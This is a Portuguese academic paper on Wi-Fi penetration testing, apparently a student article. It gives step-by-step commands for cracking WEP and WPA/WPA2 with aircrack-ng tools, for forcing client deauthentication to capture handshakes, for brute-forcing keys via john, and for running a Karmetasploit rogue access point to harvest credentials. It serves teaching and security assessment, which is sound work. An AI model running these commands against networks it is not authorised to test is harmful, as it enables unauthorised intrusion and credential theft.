Você está na página 1de 14

PEN-TEST COM NFASE EM REDES WLAN

Patrick Melo
patrickimelo@hotmail.com

Faculdade de Tecnologia de Teresina CET Teresina-PI-Brasil Abstract. Currently the wireless networks have remarkable growth both in the corporate environment and in captivity, but the safety issue is an aspect that deserves special attention, as a medium, but it is something that is not widespread. The identification and exploitation of the vulnerabilities of wireless networks (WLAN) are contained within the concept of penetration testing (Pen-Test), conceptually the PEN-TEST can also be defined as a set of techniques that we use to perform safety test. Holding PEN-TEST becomes an important mechanism to evaluate qualitatively and quantitatively even security problems that may be encountered. Must be used within a security planning methodology with well defined and concise. Resumo. Atualmente as redes sem fio tm notvel crescimento tanto em meio corporativo quanto em meio domstico, contudo o quesito segurana um aspecto que merece uma ateno especial, dado determinado meio, porm algo que no amplamente difundido. A identificao e explorao das vulnerabilidades das redes sem-fio (WLAN) esto contidas no mbito do conceito dos testes de penetrao (Pen-Test), conceitualmente o PEN-TEST tambm pode ser definido como um conjunto de tcnicas que podemos utilizar para realizao de teste de segurana. A realizao de PEN-TEST torna-se um mecanismo importante para avaliar de forma qualitativa e at mesmo quantitativa os problemas de segurana que venham a ser encontrados. Deve ser utilizado dentro de um planejamento de segurana bem definido e com metodologia concisa. Palavras-Chave: Redes, Wireless, Criptografia, Invaso, Internet, Pen-Test.

1. Introduo
O surgimento do servio sem fio comeou no sculo XIX, onde o pai do rdio Guglielmo Marconi deu os primeiros passos fazendo testes em ondas de rdio, onde criou a primeira fbrica de rdio de todo o mundo, que se chamava Wireless Telegraph and Signal Company Limited. J em 1901 aconteceu de receber sinais do outro lado do atlntico, e em 1905 foi utilizado o cdigo morse. Alguns anos aps, surgiu ento a ALOHANET que foi a primeira rede de pacotes que usava rdio frequncia no incio dos anos 70, era uma rede baseada em um terminal central que distribua as mensagens, que utilizava a topologia em estrela e fazia uso de CSMA. Com essa nova tecnologia, o IEEE (Institute of Electrical and Eletronics Engineers) constituiu um grupo de pesquisa para criar padres abertos e tornar a 1

tecnologia sem fio cada vez mais presente. O projeto denominado de Padro IEEE 802.11, nasceu em 1990, mas ficou inerte por aproximadamente sete anos devido a fatores que no permitiam que a tecnologia sem fio sasse do papel. Um dos principais fatores era a baixa taxa de transferncia de dados que inicialmente a tecnologia oferecia, que era entre 860Kbps 2Mbps. No decorrer do tempo a rede sem fio comeou a ser vista como uma tecnologia promissora e a receber ainda mais investimentos para a construo de equipamentos que possibilitassem a comunicao sem fio entre computadores. Atualmente o foco das redes de computadores sem fio (Wireless) se encontra no contexto das redes locais de computadores (Wireless Local Area Network - WLAN), tanto em solues proprietrias como no padro do IEEE. Primeiramente foram colocados em prtica alguns padres proprietrios, atravs de empresas como IBM, CISCO, Telecom e 3COM. Hoje essas e outras empresas baseiam seus produtos no padro do IEEE, devido s inmeras e j conhecidas vantagens que o padro aberto oferece: interoperabilidade, baixo custo, demanda de mercado, confiabilidade de projeto, entre outras. O padro IEEE 802.11 define basicamente uma arquitetura para as WLANs que abrange os nveis: fsico e de enlace. No nvel fsico so tratadas apenas as transmisses com freqncia de rdio (RF) e infravermelho (IR), embora outras formas de transmisso sem fio possam ser usadas, como microondas e laser, por exemplo. No nvel de enlace, o IEEE definiu um protocolo de controle de acesso ao meio (protocolo MAC), bastante semelhante ao protocolo usado em redes locais Ethernet (CSMA/CD).

2. Pen-Test
Quando se fala em segurana devem-se fazer algumas perguntas: Seguro contra o que? Seguro contra quem? Seguro em que condies? Segurana pode ser definido como dificultar ou impedir a ocorrncia de eventos indesejveis. A segurana da informao consiste na proteo de um conjunto de dados a fim de preservar o valor que o mesmo possui para um determinado indivduo ou organizao. Entre diversos objetivos a segurana trata alguns princpios bsicos que so: Confidencialidade Consiste em proteger a informao contra leitura e cpia por algum sem a devida autorizao do proprietrio da informao. Em redes de computadores significa que no trfego dos dados nenhuma informao poder ser vista, alterada ou capturada. Autenticidade Consiste na veracidade do emissor e receptor de informaes trocadas, geralmente implementada a partir de um mecanismo de senhas ou assinatura digital. Integridade - Consiste em proteger a informao contra modificao sem a permisso explcita do proprietrio daquela informao. Disponibilidade - Consiste na proteo dos servios prestados pelo sistema de forma que eles no sejam degradados ou se tornem indisponveis sem autorizao, assegurando ao usurio o acesso aos dados sempre que deles precisar. 2

Pen-test um mtodo que avalia a segurana de um sistema de computador ou de uma rede, simulando um ataque de uma fonte maliciosa. O processo envolve uma anlise nas atividades do sistema, que envolvem a busca de alguma vulnerabilidade em potencial que possa ser resultado de uma m configurao do sistema, falhas em hardwares/softwares desconhecidas, deficincia no sistema operacional ou tcnicas contra medidas. Todas as anlises submetidas pelos testes escolhidos so apresentadas no sistema, junto com uma avaliao do seu impacto e muitas vezes com uma proposta de resoluo ou de uma soluo tcnica.

3. Quebrando Criptografia Wep


Neste artigo para quebra de criptografia WEP ser utilizado o kismet, aireplay-ng e aircrak-ng. O Kismet uma ferramenta passiva que trata a busca de informaes e captura de pacotes de uma determinada rede. Quando executada, sua interface de rede automaticamente inserida em modo promscuo. Usando o sistema operacional Ubuntu 9.10, o primeiro passo para se usar o kismet baixar o pacote e depois deve-se configurar o mesmo de acordo com o driver de sua interface de rede, o arquivo de configurao o /etc/kismet/kismet.conf. #apt-get install kismet Na linha source=none,none,addme altere para seguinte forma onde o primeiro none o driver usado pela sua placa de rede e segundo none a sua interface e addme um apelido qualquer que pode-se dar a interface de rede.Quando o comando kismet executado em um terminal, voc ter acesso a seguinte interface.

Figura 1. Visualizao das redes

Pressione a tecla backspace e em seguida a tecla s e depois b, e selecione a rede alvo, para obter informaes sobre a rede alvo pressione a tecla enter.

Figura 2. Informaes da rede alvo

Para efetuar a captura de pacotes devemos selecionar a rede alvo e ativar a tecla caps lock e em seguida digitar shift+l para que o KISMET comece a captura.

Figura 3. Captura de pacotes

Agora para injetar trfego na rede deve-se colocar a interface em modo promscuo no canal da rede alvo, onde wlan2 refere-se a interface de rede e 5 o canal utilizado pela rede alvo, para isso utilizamos o seguinte comando: #airmon-ng start wlan2 5 Utilize a ferramenta aireplay-ng para a injeo de trfego na rede. O aireplay-ng faz parte da sute aircrack-ng. Para injetar trfego na rede alvo necessrio obter informaes como o BSSID do AP alvo e endereo fsico de sua interface de rede, obtendo essa informao s executar o seguinte comando em outro terminal: #apt-get install aircrack-ng

#aireplay-ng -3 -b 00:02:6F:61:DE:0B -h 00-1F-1F-13-0E-52 wlan2 Onde 00:02:6F:61:DE:0B o BSSID e o 00-1F-1F-13-0E-52 o endereo fsico de sua interface de rede ou de algum cliente conectado.

Figura 4. Injeo de trfego na rede

Os pacotes capturados pelo kismet se encontram no diretrio /var/log/kismet/, onde o arquivo utilizado para a descriptografar o arquivo Kismet-data-doteste.dump.

Para a descriptografia utilize o aircrack-ng, Com outro terminal entre no diretrio onde se encontram os pacotes capturados, em seguida execute a ferramenta selecionando a rede alvo. #cd /var/log/kismet

#aircrack-ng <nome_do_arquivo.dump>

Figura 5. Selecionando a rede alvo

Em seguida ser iniciado processo de descriptografia.

Figura 6. Descriptografando

4. Quebrando Criptografia WPA/WPA2


Na criptografia wpa, sero necessrias mais algumas ferramentas, contudo capture o handshake e use-o para a descriptografia juntamente com ferramentas de fora bruta ou wordlists. Para dar inicio a quebra da criptografia, utilize novamente o kismet, pelo terminal, e identifique todas as informaes precisas da rede, tais como SSID, BSSID, tipo de chave, canal utilizado dentre outras.

Figura 7. Informaes da rede alvo

Para visualizar os clientes que se encontram conectados rede, pressione a tecla c.

Figura 8. Clientes da rede alvo

Aps a visualizao dos clientes conectados, selecione um endereo mac de um cliente conectado para forar a desautenticao seguida da captura dos handshakes, com os comandos a seguir: #airmon-ng start <interface de rede> <canal>

#airodump-ng -w <nome do arquivo> -c <canal> <interface>

#aireplay-ng -0 1 -a <MAC DO AP> -c <MAC DO CLIENTE> <interface de rede>

Usando ataque de fora bruta:

#john -incremental=digits --stdout | aircrack-ng -b <MAC DO ACCESS POINT> -w <NOME DO ARQUIVO.cap> 8

Figura 9. Resultado do ataque de fora bruta

Usando Wordlist e mesclando com o john: #john --stdout --incremental:all | aircrack-ng -b <MAC DO ACCESS POINT> -w <NOME DO ARQUIVO*.cap>

Figura 10. Resultado do ataque usando wordlist

Existem tambm outros tipos de ferramentas de ataque customizado que exigem um pouco mais de conhecimento do atacante. Neste caso ser usada a distribuio Back track v4 que contm a sute de ferramentas Metasploit Framework, que conta com mais de 500 exploits para explorao de vulnerabilidades, onde a escolhida foi o Karma que um conjunto de 9

ferramentas para avaliar a segurana de clientes das redes sem fio em vrias camadas, e pode-se capturar credenciais ou explorar vulnerabilidades do lado do cliente no host. Pr-Requisitos: Voc precisa ter a sute aircrack-ng instalada, consulte http://www.aircrackng.org/doku.php?id=install_aircrack Karmetasploit requer um banco de dados back-end para estar no lugar antes que ele possa ser usado, isso pode ser conseguido atravs da execuo: # gem install sqlite3-ruby activerecord

Figura 11. Instalao

Configurao Inicial: A primeira coisa que /etc/dhcpd/dhcpd.conf, precisamos configurar um servidor dhcp, em

10

Figura 12. Configurao DHCP

Aps a configurao do servidor dhcp devemos iniciar o servio atravs do comando a seguir:

# /etc/init.d/dhcp3-server start Em seguida, atualize o banco de exploits do Metasploit, para isso entre no diretrio /pentest/exploits/framework3. # cd / pentest/exploits/framework3

# svn update Agora crie uma nova interface de modo monitor virtual:

# airmon-ng start wlan0 Obs: Isso ir criar um modo de interface mon0 monitor, use iwconfig para confirmar. Agora crie o novo ponto de acesso: # airbase-ng c 11 P -C 30 --essid "linksys"-v mon0 11

Figura 13. Criando um ponto de acesso

- c = canal - P = responda a todas as sondas e cria falsos SSIDS - C 30 = permitir balizamento de valores sondados ESSID (em segundos) -- essid = especificar um nico ESSID mon0 = interface de modo monitor virtual Adicione um ip a uma interface virtual atravs do comando: # ifconfig at0 10.0.0.1 netmask 255.255.255.0 up Edite o arquivo dhcp3-server que se encontra no diretrio abaixo para que a distribuio dos ips seja apenas pela interface at0 # vim /etc/default/dhcp3-server INTERFACES="at0" Logo aps entre no diretrio /pentest/exploits/framework3 para atualizar o banco do metasploit e rode o karmetasploit. 12

#svn update # . /msfconsole r karma.rc

Figura 14. Usando o Metasploit

5. Tcnicas utilizadas
Network Scanning (varreduras); Vulnerability Scanning (anlises de vulnerabilidades); Password Cracking (bruteforce); Log Review (anlise de logs); Mitm Test (anlise a partir da LAN); War Driving (teste em sistema Wireless LAN); Warchalking (teste em sistema Wireless LAN); 13

6. Tcnicas Intrusivas
Explorao de vulnerabilidades conhecidas nos servios identificados; Explorao de Vulnerabilidades em aplicaes Web; Tcnicas de Bruteforce para servios e Cracking de Senhas; Testes de Negao de Servio (DOS); Escalada de Privilgios;

7. Concluso
Em geral, comum encontrar redes sem fio desprovidas de segurana e passveis de serem facilmente invadidas, comprometendo assim toda a rede, onde atualmente toda a informao digital tem um valor imensurvel para o meio coorporativo, sendo que ter seus dados capturados por um atacante algo que pode gerar danos irreparveis e fazer um pen-test algo a ser considerado para identificar as possveis vulnerabilidades da rede e as possibilidades de invaso. As redes sem fio so muito atraentes devido a sua facilidade e comodidade, todavia o quesito segurana deve estar em primeiro lugar.

8. Referncias
How Wi-Fi Works. Disponvel em <http://computer.howstuffworks.com/wirelessnetwork.htm>. Acessado em 30.04.2010. Novas Tecnologias de Redes. Disponvel em <http://www.guiadohardware.net/tutoriais/061/>. Acessado em 10.04.2010. Entendendo (e quebrando) a Segurana em Redes Wireless. Disponvel em <http://www.guiadohardware.net/tutoriais/121/>. Acessado em 16.04.2010. Plano de Atribuio, Destinao e Distribuio de Faixas de Freqncias no Brasil. Disponvel em <http://www.anatel.gov.br/Tools/frame.asp?link=/biblioteca/planos/plano_atribuicao_2 006.pdf>. Acessado em 15.04.2010. <http://www.ieee.org> Acessado em 11.04.2010 Guerrini, I. M., Luz: Fundamentos tericos. Disponvel em<http://educar.sc.usp.br/otica/luz.htm>. Acessado em 08.05.2010. <http://www.dec.ufcg.edu.br>. Acessado em 15.05.2010

14

Você também pode gostar